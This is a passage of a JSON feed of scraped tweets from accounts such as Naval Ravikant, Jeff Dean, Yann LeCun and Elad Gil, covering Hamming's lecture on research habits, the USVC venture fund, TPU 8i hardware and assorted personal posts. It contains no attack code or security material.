for weeks. Then he flipped the question. Instead of asking for programmers to write the programs, he asked why machines could not write the programs themselves. That single inversion pushed him into the frontier of computer science. He said the pattern repeats everywhere. What looks like a defect, if you flip it correctly, becomes the exact thing that pushes you ahead of everyone else.\n\nThe fourth habit was the one that hit me the hardest. He said knowledge and productivity compound like interest. Someone who works 10 percent harder than you does not produce 10 percent more over a career. They produce twice as much. The gap doesn't add. It multiplies. And it compounds silently for years before anyone notices.\n\nHe finished the lecture with a line I have never been able to shake.\n\nHe said Pasteur's famous quote is right. Luck favors the prepared mind. But he meant it literally. You don't hope for luck. You engineer the conditions where luck can land on you. Open doors. Important problems. Inverted questions. Compounded hours. Those are not traits. Those are choices you make every single day.\n\nThe transcript has been sitting on the University of Virginia's computer science website for almost 30 years. The video is free on YouTube. Stripe Press reprinted the full lectures as a book in 2020 and Bret Victor wrote the foreword.\n\nHamming died in 1998. He gave his final lecture a few weeks before. He was 82.\n\nThe lecture that explains why some careers become legendary and others disappear is still free. Most people who could benefit from it will never open it.", + "url": "https://nitter.net/ihtesham2005/status/2047680485208531152#m", + "published_at": "2026-04-24T14:14:06+00:00", + "title_zh": "RT by @ylecun: A mathematician who shared an office with Claude Shannon at Bell Labs gave one lecture in 1986 that explains why some people win Nobel Prizes and other equally smart people spend their whole lives doing forgettable work.\n\nHis name was Richard Hamming. He won the Turing Award. He invented error-correcting codes that made modern computing possible. And he spent 30 years at Bell Labs sitting in a cafeteria at lunch watching which scientists became legendary and which ones faded into nothing.\n\nIn March 1986, he walked into a Bellcore auditorium in front of 200 researchers and told them exactly what he had seen.\n\nHere's the framework that has been quoted by every serious scientist for the last 40 years.\n\nHis opening line landed like a punch. He said most scientists he worked with at Bell Labs were just as smart as the Nobel Prize winners. Just as hardworking. Just as credentialed. And yet at the end of a 40-year career, one group had changed entire fields and the other group was forgotten by the time they retired.\n\nHe wanted to know what the difference actually was. And he said it wasn't luck. It wasn't IQ. It was a specific set of habits that almost nobody is willing to follow.\n\nThe first habit was the one that hurts the most to hear. He said most scientists deliberately avoid the most important problem in their field because the odds of failure are too high. They pick a safe adjacent problem, solve it cleanly, publish it, and move on. And because they never swing at the hard problem, they never hit it. He said if you do not work on an important problem, it is unlikely you will do important work. That is not a motivational line. That is a logical one.\n\nThe second habit was about doors. Literal doors. He noticed that the scientists at Bell Labs who kept their office doors closed got more done in the short term because they had no interruptions. But the scientists who kept their doors open got more done over a career. The open-door scientists were interrupted constantly. They also absorbed every new idea passing through the hallway. Ten years in, they were working on problems the closed-door scientists did not even know existed.\n\nThe third habit was inversion. When Bell Labs refused to give him the team of programmers he wanted, Hamming sat with the rejection for weeks. Then he flipped the question. Instead of asking for programmers to write the programs, he asked why machines could not write the programs themselves. That single inversion pushed him into the frontier of computer science. He said the pattern repeats everywhere. What looks like a defect, if you flip it correctly, becomes the exact thing that pushes you ahead of everyone else.\n\nThe fourth habit was the one that hit me the hardest. He said knowledge and productivity compound like interest. Someone who works 10 percent harder than you does not produce 10 percent more over a career. They produce twice as much. The gap doesn't add. It multiplies. And it compounds silently for years before anyone notices.\n\nHe finished the lecture with a line I have never been able to shake.\n\nHe said Pasteur's famous quote is right. Luck favors the prepared mind. But he meant it literally. You don't hope for luck. You engineer the conditions where luck can land on you. Open doors. Important problems. Inverted questions. Compounded hours. Those are not traits. Those are choices you make every single day.\n\nThe transcript has been sitting on the University of Virginia's computer science website for almost 30 years. The video is free on YouTube. Stripe Press reprinted the full lectures as a book in 2020 and Bret Victor wrote the foreword.\n\nHamming died in 1998. He gave his final lecture a few weeks before. He was 82.\n\nThe lecture that explains why some careers become legendary and others disappear is still free. Most people who could benefit from it will never open it." + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Feel like very few serious people make the argument Britain should develop its own LLM? Certainly not an argument you see made in Westminster often during the sovereignty debate. \n\nAlso some other eyebrow-raising sections in this interview.", + "url": "https://nitter.net/Discoplomacy/status/2047676640059154653#m", + "published_at": "2026-04-24T13:58:49+00:00", + "title_zh": "RT by @ylecun: Feel like very few serious people make the argument Britain should develop its own LLM? Certainly not an argument you see made in Westminster often during the sovereignty debate. \n\nAlso some other eyebrow-raising sections in this interview." + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: The Arxiv for the new Decoupled DiLoCo paper is now up: https://arxiv.org/abs/2604.21428v1", + "url": "https://nitter.net/JeffDean/status/2047665074471387456#m", + "published_at": "2026-04-24T13:12:52+00:00", + "title_zh": "R to @JeffDean: The Arxiv for the new Decoupled DiLoCo paper is now up: https://arxiv.org/abs/2604.21428v1" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: Fundrise VCX is exactly why USVC needs to exist.\n\nRetail wants access to OpenAI, Anthropic, SpaceX, xAI, etc. That demand is not going away.\n\nVCX turned that demand into a liquid public wrapper that still trades around 4-5x NAV.\n\nAt today’s ~$90 price vs. recent NAV references around ~$19, buyers may be paying roughly $4-5 for every $1 of actual private tech exposure.\n\nAccess at the wrong price is not access. It’s just scarcity monetized.\n\nYes, venture has fees. It always has. You pay for access, selection, and portfolio construction.\n\nBut paying venture fees is very different from paying 4-5x NAV for the wrapper before the venture return even happens.\n\nThe companies inside VCX can be great and retail can still get wrecked if the premium collapses.\n\nUSVC is the cleaner answer: diversified private tech exposure, SEC-registered, available to unaccredited investors, and bought around NAV instead of through a hyped public wrapper trading miles above its assets.\n\nThe real test for me is simple: my mom wants to invest in startups/private tech.\n\nI would rather she do USVC 100x over VCX, because at least with USVC I can understand the structure, explain the tradeoffs, and know she is not just paying a massive public-market hype premium for the wrapper.\n\nIn venture, access matters.\n\nBut the wrapper can still ruin the investment. And right now, some products are monetizing retail demand for private AI/startup exposure more than they are solving it.\n\nUSVC is at least aimed at the right problem.", + "url": "https://nitter.net/alexbass/status/2047645157080658335#m", + "published_at": "2026-04-24T11:53:43+00:00", + "title_zh": "RT by @naval: Fundrise VCX is exactly why USVC needs to exist.\n\nRetail wants access to OpenAI, Anthropic, SpaceX, xAI, etc. That demand is not going away.\n\nVCX turned that demand into a liquid public wrapper that still trades around 4-5x NAV.\n\nAt today’s ~$90 price vs. recent NAV references around ~$19, buyers may be paying roughly $4-5 for every $1 of actual private tech exposure.\n\nAccess at the wrong price is not access. It’s just scarcity monetized.\n\nYes, venture has fees. It always has. You pay for access, selection, and portfolio construction.\n\nBut paying venture fees is very different from paying 4-5x NAV for the wrapper before the venture return even happens.\n\nThe companies inside VCX can be great and retail can still get wrecked if the premium collapses.\n\nUSVC is the cleaner answer: diversified private tech exposure, SEC-registered, available to unaccredited investors, and bought around NAV instead of through a hyped public wrapper trading miles above its assets.\n\nThe real test for me is simple: my mom wants to invest in startups/private tech.\n\nI would rather she do USVC 100x over VCX, because at least with USVC I can understand the structure, explain the tradeoffs, and know she is not just paying a massive public-market hype premium for the wrapper.\n\nIn venture, access matters.\n\nBut the wrapper can still ruin the investment. And right now, some products are monetizing retail demand for private AI/startup exposure more than they are solving it.\n\nUSVC is at least aimed at the right problem." + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "Im genuinely this Close to killing myself rn & this Shit happens like Okay", + "url": "https://nitter.net/satoshibun/status/2047641832624893993#m", + "published_at": "2026-04-24T11:40:30+00:00", + "title_zh": "Im genuinely this Close to killing myself rn & this Shit happens like Okay" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: How do Delilah Defenders actively defend her actions with these Toons literally existing.\n\nI just don't get it", + "url": "https://nitter.net/DaCapTainXD/status/2047633324676440561#m", + "published_at": "2026-04-24T11:06:42+00:00", + "title_zh": "RT by @satoshibun: How do Delilah Defenders actively defend her actions with these Toons literally existing.\n\nI just don't get it" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: 😾", + "url": "https://nitter.net/aaa___kanato/status/2047606779677376714#m", + "published_at": "2026-04-24T09:21:13+00:00", + "title_zh": "RT by @satoshibun: 😾" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: ♦️━━━━━━━━━━━━━♣️\n⠀⠀⠀⠀⠀⠀⠀『#文字化化』\n⠀「不思議の国のアリス」テーマ\n⠀グラフアート新商品発売決定!\n♠️━━━━━━━━━━━━━♥️\n\n📅5/23~6/5\n📍eeo Store 池袋本店\n🛒通販でも販売開始!:https://eeo.today/store/101/title/6785?utm_source=twitter&utm_medium=social&utm_campaign=20260424_MJBK\n\n商品詳細はURLとツリーをチェック🎩🐰\n\n#Homicipher", + "url": "https://nitter.net/eeo_store/status/2047586383519531500#m", + "published_at": "2026-04-24T08:00:10+00:00", + "title_zh": "RT by @satoshibun: ♦️━━━━━━━━━━━━━♣️\n⠀⠀⠀⠀⠀⠀⠀『#文字化化』\n⠀「不思議の国のアリス」テーマ\n⠀グラフアート新商品発売決定!\n♠️━━━━━━━━━━━━━♥️\n\n📅5/23~6/5\n📍eeo Store 池袋本店\n🛒通販でも販売開始!:https://eeo.today/store/101/title/6785?utm_source=twitter&utm_medium=social&utm_campaign=20260424_MJBK\n\n商品詳細はURLとツリーをチェック🎩🐰\n\n#Homicipher" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/avlok/status/204754692…", + "url": "https://nitter.net/naval/status/2047550896670908809#m", + "published_at": "2026-04-24T05:39:10+00:00", + "title_zh": "R to @naval: x.com/avlok/status/204754692…" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: I’ve seen a lot of questions about USVC, AngelList’s newest product. First, don’t invest in venture capital if you can’t afford to lose your money. Put your savings somewhere safer. But if you’re considering USVC, here’s a thread that answers the most common questions and explains how it works:", + "url": "https://nitter.net/avlok/status/2047546920747307466#m", + "published_at": "2026-04-24T05:23:22+00:00", + "title_zh": "RT by @naval: I’ve seen a lot of questions about USVC, AngelList’s newest product. First, don’t invest in venture capital if you can’t afford to lose your money. Put your savings somewhere safer. But if you’re considering USVC, here’s a thread that answers the most common questions and explains how it works:" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I've been thinking about local LLMs a lot these days.", + "url": "https://nitter.net/liuliu/status/2047527371486658814#m", + "published_at": "2026-04-24T04:05:41+00:00", + "title_zh": "I've been thinking about local LLMs a lot these days." + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Hari nails it:\n\n“Don’t listen to people who don’t know how private markets work.”", + "url": "https://nitter.net/naval/status/2047520212787015748#m", + "published_at": "2026-04-24T03:37:14+00:00", + "title_zh": "Hari nails it:\n\n“Don’t listen to people who don’t know how private markets work.”" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/haridigresses/status/2…", + "url": "https://nitter.net/naval/status/2047519250433421604#m", + "published_at": "2026-04-24T03:33:25+00:00", + "title_zh": "R to @naval: x.com/haridigresses/status/2…" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/nivi/status/2047471220…", + "url": "https://nitter.net/naval/status/2047510419565420779#m", + "published_at": "2026-04-24T02:58:19+00:00", + "title_zh": "R to @naval: x.com/nivi/status/2047471220…" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "New life plan-\n \nMove to Brooklyn\nGet neck tat\nRide bike everywhere\nCold brew own coffee (also start drinking coffee)\nAdopt 12 year old stray cat, name him Nietzsche\nVape mango pods, but ironically\nWear scarf everywhere during summer", + "url": "https://nitter.net/eladgil/status/2047489459378397604#m", + "published_at": "2026-04-24T01:35:02+00:00", + "title_zh": "New life plan-\n \nMove to Brooklyn\nGet neck tat\nRide bike everywhere\nCold brew own coffee (also start drinking coffee)\nAdopt 12 year old stray cat, name him Nietzsche\nVape mango pods, but ironically\nWear scarf everywhere during summer" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: USVC is a new fund being offered by Naval, it's been discussed widely on X. I have some thoughts and why people should look into it. I have no connection with it and not being paid to shill. \n\nBack when I started dating my wife, I told her to set up a Roth IRA and buy Apple. Every year, I'd have her put the max limit into a Roth IRA and buy Apple. Apple was $20 or so. When I checked it earlier this year, I was blown away. It was a small mount of money that grew into something nice.\n\nApple, Facebook, Nvidia, Tesla, etc. would IPO early. You could have MASSIVE outsized gains if you were investing in the early 2010's. \n\nYou couldn't get into them pre-IPO unless you had a connection. There are people on this site who pretend to be geniuses because a friend hooked them up with a tag-along investment into the seed round of Uber. It was a bro favor, good for them, they do leave that part out tho and let the false narrative of being a genius investor flow through. \n\nYou used to be able to buy in pre-IPO with a small check. Now it's almost impossible unless you have a friend, and they set up an SPV, they are usually doing you a favor, because huge funds and institutional investors gobble it all up. (This has also lead to the VC class screwing themselves over, because if you can't buy today's version of Apple at $20, because all the big gains are sucked up before the public offering, then why do you have buy in into this entire system?)\n\nYou could, as a small investor, get huge results pre-IPO via a small check, or also do well after the IPO, because companies IPO'ed earlier. Ie Apple at $20, Amazon in the 20's, etc.\n\nIt's very hard to get big gains now, because companies remain private much longer. Many companies don't want to IPO and then deal with the hassle of lawfare. Look at what happened to Elon in Delaware. \n\nFor us, as an ordinary person, this means that by the time a company goes public, we are \"last money in.\" This is why I always tell friends and family to buy SPY (or FXAIX) and QQQM. Don't day trade. You won't beat the market. (Everyone who claims they do are lying, they use a short timeline and never mention all of the losing trades. Or they are insider trading or beating the market by a relatively small amount. For most of us, day trading is the way of death.) \n\nWith USVC, regular people can get into some of the companies that will IPO, eventually, at high valuations still, but pre-IPO.\n\nI've read all of the negative commentary about the fund. I don't understand the \"illiquid\" complaint. If you started your own business and bought equipment, you wouldn't be paying yourself. If you really had to expand, you might not pay yourself for years. When you put your money in, it's locked up, you grow out the company for several years. Hopefully you can afford to pay yourself after a couple of years. If you QSBS'ed it, maybe you sell in 5-10. Who knows. In the meantime, yes, your money is gone. Every business owner knows this feeling. Your company is \"worth\" some amounts on paper, and you pay yourself a salary to live on. That's if things are going well.\n\nThere's also a lot of discussion around carry and fees. The question is will those fees be less than what the post-IPO price of the companies will be is. That's up to everyone to decide for themselves.\n\nIn any case, I have no financial interest into this fund. I am not telling you to buy into or not. \n\nI do like to flag stuff like this for people who read me, operating under the rule that, \"Cerno writes for the version of Cerno who did not understand any of this stuff, but sure would have liked to have.\" As an example, I didn't know what QSBS was until it was too late. [Frown face.] \n\nAnd I didn't buy Tesla at $2 [panic attack], despite wanting to, because a financial adviser friend told me, \"You shouldn't invest on a feeling, you don't have any edge here.\" \n\nI would tell my prior self: You can't invest EVERYTHING based on vibes, but you can and should absolutely do so now and then. (Note: If you have an addictive personality, this is bad advice. But I am only addicted to X and See's Candies.)\n\nBut I will post the negative comments about the fund. I don't want anyone to ever read me and obtain bad information.\n\nEveryone has to decide for themselves what to do.\n\nI've also learned from experience that if something goes well, nobody sends me money or a box of cigars as a thank you. It was their brilliance that led them to the big gains. If it goes wrong, then the fault is all mine and people hate me for it.\n\nThat's also why I don't even want to post about the fund at all, but here goes.", + "url": "https://nitter.net/Cernovich/status/2047481012826124516#m", + "published_at": "2026-04-24T01:01:28+00:00", + "title_zh": "RT by @naval: USVC is a new fund being offered by Naval, it's been discussed widely on X. I have some thoughts and why people should look into it. I have no connection with it and not being paid to shill. \n\nBack when I started dating my wife, I told her to set up a Roth IRA and buy Apple. Every year, I'd have her put the max limit into a Roth IRA and buy Apple. Apple was $20 or so. When I checked it earlier this year, I was blown away. It was a small mount of money that grew into something nice.\n\nApple, Facebook, Nvidia, Tesla, etc. would IPO early. You could have MASSIVE outsized gains if you were investing in the early 2010's. \n\nYou couldn't get into them pre-IPO unless you had a connection. There are people on this site who pretend to be geniuses because a friend hooked them up with a tag-along investment into the seed round of Uber. It was a bro favor, good for them, they do leave that part out tho and let the false narrative of being a genius investor flow through. \n\nYou used to be able to buy in pre-IPO with a small check. Now it's almost impossible unless you have a friend, and they set up an SPV, they are usually doing you a favor, because huge funds and institutional investors gobble it all up. (This has also lead to the VC class screwing themselves over, because if you can't buy today's version of Apple at $20, because all the big gains are sucked up before the public offering, then why do you have buy in into this entire system?)\n\nYou could, as a small investor, get huge results pre-IPO via a small check, or also do well after the IPO, because companies IPO'ed earlier. Ie Apple at $20, Amazon in the 20's, etc.\n\nIt's very hard to get big gains now, because companies remain private much longer. Many companies don't want to IPO and then deal with the hassle of lawfare. Look at what happened to Elon in Delaware. \n\nFor us, as an ordinary person, this means that by the time a company goes public, we are \"last money in.\" This is why I always tell friends and family to buy SPY (or FXAIX) and QQQM. Don't day trade. You won't beat the market. (Everyone who claims they do are lying, they use a short timeline and never mention all of the losing trades. Or they are insider trading or beating the market by a relatively small amount. For most of us, day trading is the way of death.) \n\nWith USVC, regular people can get into some of the companies that will IPO, eventually, at high valuations still, but pre-IPO.\n\nI've read all of the negative commentary about the fund. I don't understand the \"illiquid\" complaint. If you started your own business and bought equipment, you wouldn't be paying yourself. If you really had to expand, you might not pay yourself for years. When you put your money in, it's locked up, you grow out the company for several years. Hopefully you can afford to pay yourself after a couple of years. If you QSBS'ed it, maybe you sell in 5-10. Who knows. In the meantime, yes, your money is gone. Every business owner knows this feeling. Your company is \"worth\" some amounts on paper, and you pay yourself a salary to live on. That's if things are going well.\n\nThere's also a lot of discussion around carry and fees. The question is will those fees be less than what the post-IPO price of the companies will be is. That's up to everyone to decide for themselves.\n\nIn any case, I have no financial interest into this fund. I am not telling you to buy into or not. \n\nI do like to flag stuff like this for people who read me, operating under the rule that, \"Cerno writes for the version of Cerno who did not understand any of this stuff, but sure would have liked to have.\" As an example, I didn't know what QSBS was until it was too late. [Frown face.] \n\nAnd I didn't buy Tesla at $2 [panic attack], despite wanting to, because a financial adviser friend told me, \"You shouldn't invest on a feeling, you don't have any edge here.\" \n\nI would tell my prior self: You can't invest EVERYTHING based on vibes, but you can and should absolutely do so now and then. (Note: If you have an addictive personality, this is bad advice. But I am only addicted to X and See's Candies.)\n\nBut I will post the negative comments about the fund. I don't want anyone to ever read me and obtain bad information.\n\nEveryone has to decide for themselves what to do.\n\nI've also learned from experience that if something goes well, nobody sends me money or a box of cigars as a thank you. It was their brilliance that led them to the big gains. If it goes wrong, then the fault is all mine and people hate me for it.\n\nThat's also why I don't even want to post about the fund at all, but here goes." + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: I spent the morning digging into USVC fees.\n\nTLDR: In my opinion, there is no lower-cost way to invest in VC other than becoming one. I’m expecting to pay the same or less than it costs to invest in a good VC fund. And a lot less than investing in a fund-of-funds. All while getting the benefits of a fund-of-funds that can do direct, secondary, and fund investments.\n\nCarry. If USVC invests in a fund or SPV, I will pay that manager’s ~20% carry. That’s what I expected. All fund-of-funds do it this way. I’m glad to pay carry to invest with good managers. USVC doesn’t charge additional carry.\n\nDirect investments. There is no underlying carry on USVC’s direct investments and they aim to make this a major portion of the portfolio. This would bring down the blended cost of USVC substantially, compared to a VC fund.\n\nFees. The annual fee in the first year is capped at 2.5%. This includes the fees of the underlying funds that USVC invests in, which is a huge deal. Just investing in a VC fund costs 2-2.5% a year. Also, the fee would be 3.6% but AngelList is subsidizing it in the first year.\n\nThere’s a possibility the annual fee could go up in the future and I’ve told the team that this is extremely confusing and weird, and they are working on it with haste.\n\nOverall, I’m expecting to pay the same or less than it costs to invest in a good VC fund, but I’m actually getting access to a fund-of-funds that can do direct, secondary, and fund investments. A typical fund-of-funds charges another 1/10 (fees/carry) on top of the VC’s 2/20, for a total of 3/30.\n\nSome other things I learned:\n\nEarly-stage. Early-stage deals are planned. I would rather invest now in case those early-stage investments get marked up quickly. These deals will be riskier and more illiquid, so there’s no free lunch here. The current portfolio includes late-stage (OpenAI, Anthropic, xAI) and mid-stage (Sierra, Vercel, Crusoe, Legora).\n\nIlliquidity. This is venture capital. The underlying investments are illiquid. Don’t invest if you’re uncomfortable with illiquidity. That said, USVC is working on redemptions of up to 5% of the fund every quarter. It’s not guaranteed, but if it’s offered, you can choose to get partial liquidity along the way.\n\nInternational. There is a lot of demand from international investors. USVC is not yet set up to accept international investors at scale, but they’re working on it.\n\nSales load. There is no sales load. USVC is only available on usvc dot com and the sales load is waived if you buy through the site. In the future, brokers that list USVC may charge up to a ~3% sales load; that’s how they make their money.\n\nDisclosure: I’m a co-founder of AngelList and have shares in the business.", + "url": "https://nitter.net/nivi/status/2047471220451578132#m", + "published_at": "2026-04-24T00:22:33+00:00", + "title_zh": "RT by @naval: I spent the morning digging into USVC fees.\n\nTLDR: In my opinion, there is no lower-cost way to invest in VC other than becoming one. I’m expecting to pay the same or less than it costs to invest in a good VC fund. And a lot less than investing in a fund-of-funds. All while getting the benefits of a fund-of-funds that can do direct, secondary, and fund investments.\n\nCarry. If USVC invests in a fund or SPV, I will pay that manager’s ~20% carry. That’s what I expected. All fund-of-funds do it this way. I’m glad to pay carry to invest with good managers. USVC doesn’t charge additional carry.\n\nDirect investments. There is no underlying carry on USVC’s direct investments and they aim to make this a major portion of the portfolio. This would bring down the blended cost of USVC substantially, compared to a VC fund.\n\nFees. The annual fee in the first year is capped at 2.5%. This includes the fees of the underlying funds that USVC invests in, which is a huge deal. Just investing in a VC fund costs 2-2.5% a year. Also, the fee would be 3.6% but AngelList is subsidizing it in the first year.\n\nThere’s a possibility the annual fee could go up in the future and I’ve told the team that this is extremely confusing and weird, and they are working on it with haste.\n\nOverall, I’m expecting to pay the same or less than it costs to invest in a good VC fund, but I’m actually getting access to a fund-of-funds that can do direct, secondary, and fund investments. A typical fund-of-funds charges another 1/10 (fees/carry) on top of the VC’s 2/20, for a total of 3/30.\n\nSome other things I learned:\n\nEarly-stage. Early-stage deals are planned. I would rather invest now in case those early-stage investments get marked up quickly. These deals will be riskier and more illiquid, so there’s no free lunch here. The current portfolio includes late-stage (OpenAI, Anthropic, xAI) and mid-stage (Sierra, Vercel, Crusoe, Legora).\n\nIlliquidity. This is venture capital. The underlying investments are illiquid. Don’t invest if you’re uncomfortable with illiquidity. That said, USVC is working on redemptions of up to 5% of the fund every quarter. It’s not guaranteed, but if it’s offered, you can choose to get partial liquidity along the way.\n\nInternational. There is a lot of demand from international investors. USVC is not yet set up to accept international investors at scale, but they’re working on it.\n\nSales load. There is no sales load. USVC is only available on usvc dot com and the sales load is waived if you buy through the site. In the future, brokers that list USVC may charge up to a ~3% sales load; that’s how they make their money.\n\nDisclosure: I’m a co-founder of AngelList and have shares in the business." + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Why the biggest fintech players are in for a shock.\n\n\"The shift is from human UX to agent UX.\n\nIn the past, you won with dashboards, design and user experience.\n\nNow, the buyer is an AI agent, and it only cares about APIs, performance and integration.\n\nThat breaks traditional moats and puts even the biggest fintech players at risk.\" @jasonlk\n\nLove to hear your thoughts @pedroh96 @awxjack @sebatklarna @fintechjunkie", + "url": "https://nitter.net/HarryStebbings/status/2047461264998478113#m", + "published_at": "2026-04-23T23:43:00+00:00", + "title_zh": "Why the biggest fintech players are in for a shock.\n\n\"The shift is from human UX to agent UX.\n\nIn the past, you won with dashboards, design and user experience.\n\nNow, the buyer is an AI agent, and it only cares about APIs, performance and integration.\n\nThat breaks traditional moats and puts even the biggest fintech players at risk.\" @jasonlk\n\nLove to hear your thoughts @pedroh96 @awxjack @sebatklarna @fintechjunkie" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump completely passed out, reawakened, then passed out again during today's pressor in the Oval Office. 😂🤣👇", + "url": "https://nitter.net/maddenifico/status/2047454244781818205#m", + "published_at": "2026-04-23T23:15:06+00:00", + "title_zh": "RT by @ylecun: Trump completely passed out, reawakened, then passed out again during today's pressor in the Oval Office. 😂🤣👇" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: How does one make sense of SF?\n\nWe are living through the craziest computing revolution of the last 2 decades....and 95% of the value being created is within a 4-mile radius in SF (h/t @eladgil )\n\nIt's just hard to understand....why is the concentration so high?\n\nWhat is it about this place? There are good reasons that people will offer...good universities, great companies, talent networks, venture capital yada yada yada\n\nBut all of that is hard to emotionally understand.\n\nI tend to try to answer these questions through my own lived experience.\n\nTwo things happened this week that brought it home for me.\n\nOn Wed evening, two GOATS of the design world (@soleio and @rsms ) did a design talk at SPC.\n\nI saw some other GOATS at the talk (@aaron_ , @benbarry )\n\nAnd you realize that these GOATS are just so curious about the world. They just want to build and learn. And give back. And with an air of humility and passion. It's so so cool and inspiring.\n\nAnd then this week we had someone release a mind-bendingly amazing demo of every pixel being generated.\n\nhttps://x.com/zan2434/status/2046982383430496444\n\nPeople were blown away but @eddiejiao_obj and @zan2434 had been jamming creatively for a bunch of time @southpkcommons . \n\nAnd in that entire time, they were surrounded by a culture and environment and ecosystem that says \"that is crazy but my god, if it works, then what could happen\"\n\nThere is wonder, amazement and curiosity.\n\nAnd passion.\n\nI wish this city were cleaner and better governed (but Dan Lurie is crushing).\n\nWe are so lucky to be surrounded by weirdos who love to build.\n\nThis is why we are who we are.", + "url": "https://nitter.net/adityaag/status/2047421448449630379#m", + "published_at": "2026-04-23T21:04:47+00:00", + "title_zh": "RT by @eladgil: How does one make sense of SF?\n\nWe are living through the craziest computing revolution of the last 2 decades....and 95% of the value being created is within a 4-mile radius in SF (h/t @eladgil )\n\nIt's just hard to understand....why is the concentration so high?\n\nWhat is it about this place? There are good reasons that people will offer...good universities, great companies, talent networks, venture capital yada yada yada\n\nBut all of that is hard to emotionally understand.\n\nI tend to try to answer these questions through my own lived experience.\n\nTwo things happened this week that brought it home for me.\n\nOn Wed evening, two GOATS of the design world (@soleio and @rsms ) did a design talk at SPC.\n\nI saw some other GOATS at the talk (@aaron_ , @benbarry )\n\nAnd you realize that these GOATS are just so curious about the world. They just want to build and learn. And give back. And with an air of humility and passion. It's so so cool and inspiring.\n\nAnd then this week we had someone release a mind-bendingly amazing demo of every pixel being generated.\n\nhttps://x.com/zan2434/status/2046982383430496444\n\nPeople were blown away but @eddiejiao_obj and @zan2434 had been jamming creatively for a bunch of time @southpkcommons . \n\nAnd in that entire time, they were surrounded by a culture and environment and ecosystem that says \"that is crazy but my god, if it works, then what could happen\"\n\nThere is wonder, amazement and curiosity.\n\nAnd passion.\n\nI wish this city were cleaner and better governed (but Dan Lurie is crushing).\n\nWe are so lucky to be surrounded by weirdos who love to build.\n\nThis is why we are who we are." + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: It's worth pointing out that we have been pushing on large-scale training and asynchronous techniques for the last ~14 years. Here's our NeurIPS 2012 paper where we demonstrated that this approach could be used to train very large neural networks (for the time: 30X larger than any previous neural network), and to spread the training out across thousands of machines in a fault-tolerant manner.\n\nPDF: https://static.googleusercontent.com/media/research.google.com/en//archive/large_deep_networks_nips2012.pdf\n\nhttps://static.googleusercontent.com/media/research.google.com/en//archive/large_deep_networks_nips2012.pdf\n\n(This paper doesn't get as much attention because we neglected to put it on Arxiv at the time: oops!)", + "url": "https://nitter.net/JeffDean/status/2047408945950802186#m", + "published_at": "2026-04-23T20:15:06+00:00", + "title_zh": "R to @JeffDean: It's worth pointing out that we have been pushing on large-scale training and asynchronous techniques for the last ~14 years. Here's our NeurIPS 2012 paper where we demonstrated that this approach could be used to train very large neural networks (for the time: 30X larger than any previous neural network), and to spread the training out across thousands of machines in a fault-tolerant manner.\n\nPDF: https://static.googleusercontent.com/media/research.google.com/en//archive/large_deep_networks_nips2012.pdf\n\nhttps://static.googleusercontent.com/media/research.google.com/en//archive/large_deep_networks_nips2012.pdf\n\n(This paper doesn't get as much attention because we neglected to put it on Arxiv at the time: oops!)" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: TPU 8i is co-designed with our Gemini research team to support low latency inference. Among the attributes that support this are large amounts of on-chip SRAM, enabling more computations to be done on chip without having to go to HBM for weights or KVCache state as often.\n\nThe boardfly network topology (see image below) offers a much lower diameter network to connect all 1152 chips in an 8i pod, by fully connecting all 4 chips on the board together, fully connecting groups of 8 boards together, and then fully connecting 36 groups of 8 boards together. In addition, there is specialized Collectives Acceleration Engine (CAE) circuitry on each chip to offload various kinds of reductions and other global operations from the main computational portion of each chip, reducing on-chip latency by up to 5x.\n\nTogether, these features will offer very high throughput for large-scale models (including MoEs, which often require mapping onto many chips for inference), and will do so at very low latency. This will make agentic workloads and interactive usage really shine on the TPU 8i.", + "url": "https://nitter.net/JeffDean/status/2047407537566495033#m", + "published_at": "2026-04-23T20:09:30+00:00", + "title_zh": "R to @JeffDean: TPU 8i is co-designed with our Gemini research team to support low latency inference. Among the attributes that support this are large amounts of on-chip SRAM, enabling more computations to be done on chip without having to go to HBM for weights or KVCache state as often.\n\nThe boardfly network topology (see image below) offers a much lower diameter network to connect all 1152 chips in an 8i pod, by fully connecting all 4 chips on the board together, fully connecting groups of 8 boards together, and then fully connecting 36 groups of 8 boards together. In addition, there is specialized Collectives Acceleration Engine (CAE) circuitry on each chip to offload various kinds of reductions and other global operations from the main computational portion of each chip, reducing on-chip latency by up to 5x.\n\nTogether, these features will offer very high throughput for large-scale models (including MoEs, which often require mapping onto many chips for inference), and will do so at very low latency. This will make agentic workloads and interactive usage really shine on the TPU 8i." + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: First, let's talk about TPU 8t, which is designed for large-scale 